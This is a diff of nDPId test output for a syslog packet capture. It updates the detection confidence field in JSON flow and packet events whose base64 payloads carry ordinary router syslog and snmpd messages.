00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1600782466695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1600782466695,"pkt":"qrvMdK0EqrvMag4ECABFAACHAAQAAP8RGw4KFrPXrBo2TN9OAgIAcw8OPDE4OT44NTogUjE6IFtzeXNsb2dAOSBzX3NuPSI1Il06ICpTZXAgMjIgMTM6NDc6NDUuNjcyOiAlU1lTLTUtQ09ORklHX0k6IENvbmZpZ3VyZWQgZnJvbSBjb25zb2xlIGJ5IGNvbnNvbGU="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1600782475311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1600782475311,"pkt":"qrvMdK0EqrvMag4ECABFAACrAAUAAP8RGukKFrPXrBo2TN9OAgIAl+OwPDE5MD44NjogUjE6IFtzeXNsb2dAOSBzX3NuPSI2Il06ICpTZXAgMjIgMTM6NDc6NTQuMzAzOiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgc3RvcHBlZCAtIENMSSBpbml0aWF0ZWQ="} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1600782476392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":184,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":184,"pkt_l4_len":150,"thread_ts_msec":1600782476392,"pkt":"qrvMdK0EqrvMag4ECABFAACqAAYAAP8RGukKFrPXrBo2TN9OAgIAlm33PDE5MD44NzogUjE6IFtzeXNsb2dAOSBzX3NuPSI3Il06ICpTZXAgMjIgMTM6NDc6NTUuNjk5OiAlU1lTLTYtTE9HR0lOR0hPU1RfU1RBUlRTVE9QOiBMb2dnaW5nIHRvIGhvc3QgMTAuMS4yLjIgcG9ydCA1MTQgcmVzdG9yZWQgQ0xJIGluaXRpYXRlZA=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1600782514222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":249,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":249,"pkt_l4_len":215,"thread_ts_msec":1600782514222,"pkt":"qrvMkvyHqrvMTZFeCABFAADrAAkAAP8RSX\/AqC2iCtB4X99OAgIA1wa4PDE4OT45MjogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDg6MzMuOTc4PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1600782515213,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1600782515213,"pkt":"qrvMkvyHqrvMTZFeCABFAADsAAoAAP8RSX3AqC2iCtB4X99OAgIA2PlAPDE4OT45MzogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElORVBST1RPPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5VUERPV048L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ4OjM0LjIwMDwvdGltZT48YXJncz48YXJnIGlkPSIwIj5Mb29wYmFjazE8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1600782647886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1600782647886,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAAsAAP8R5RQK4CuVrBfzWd9OAgIA0\/DmPDE4OT45NDogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo0Ni43Nzc8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1600782652384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1600782652384,"pkt":"qrvMj6IeqrvMSxtwCABFAADoAAwAAP8R5RIK4CuVrBfzWd9OAgIA1N5pPDE4OT45NTogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5MSU5FUFJPVE88L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPlVQRE9XTjwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NTA6NTEuNzUyPC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPkxvb3BiYWNrMjwvYXJnPjxhcmcgaWQ9IjEiPnVwPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1600782653380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1600782653380,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAA0AAP8R5RIK4CuVrBfzWd9OAgIA0\/vrPDE4OT45NjogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo1Mi4zMTI8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":49,"total-skipped-flows":0,"total-l4-payload-len":9237,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":2,"current-active-flows":3,"total-active-flows":13,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1618744015613} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1618744015613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1618744015613,"pkt":"AAAAAAAAAAgA5occCABFAABVAABAADwRr+OsGuW+rBdQxAICAgIAQS7mPDMwPnNubXBkWzY5NTZdOiBDb25uZWN0aW9uIGZyb20gVURQOiBbMTI3LjAuMC4xXToyMTMxMSAK"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1618744015638,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1618744015638,"pkt":"AAAAAAAAAAgA5occCABFAABiAABAADwRr9asGuW+rBdQxAICAgIATjrrPDMwPnNubXBkWzY5NTZdOiBSZWNlaXZlZCBTTk1QIHBhY2tldChzKSBmcm9tIFVEUDogWzEyNy4wLjAuMV06MjEzMTEgCg=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1618744015652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1618744015652,"pkt":"AAAAAAAAAAgA5occCABFAABVAABAADwRr+OsGuW+rBdQxAICAgIAQS7mPDMwPnNubXBkWzY5NTZdOiBDb25uZWN0aW9uIGZyb20gVURQOiBbMTI3LjAuMC4xXToyMTMxMSAK"} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744117704,"flow_last_seen":1618744117704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744117704,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1618744117704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744117704,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQEPOQAA\/BnudCrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/r2sAAAIEBbQBAwMFAQEICgVJ71MAAAAABAIAAA=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1618744118712,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744118712,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQEydQAA\/BnLOCrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/q4MAAAIEBbQBAwMFAQEICgVJ8zsAAAAABAIAAA=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1618744119704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744119704,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQKarQAA\/BhjACrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/p5sAAAIEBbQBAwMFAQEICgVJ9yMAAAAABAIAAA=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1618744117704,"flow_last_seen":1618744129233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1618744129233,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1618744015613,"flow_last_seen":1618744046789,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1618744314014,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1618744117704,"flow_last_seen":1618744129233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1618744129233,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 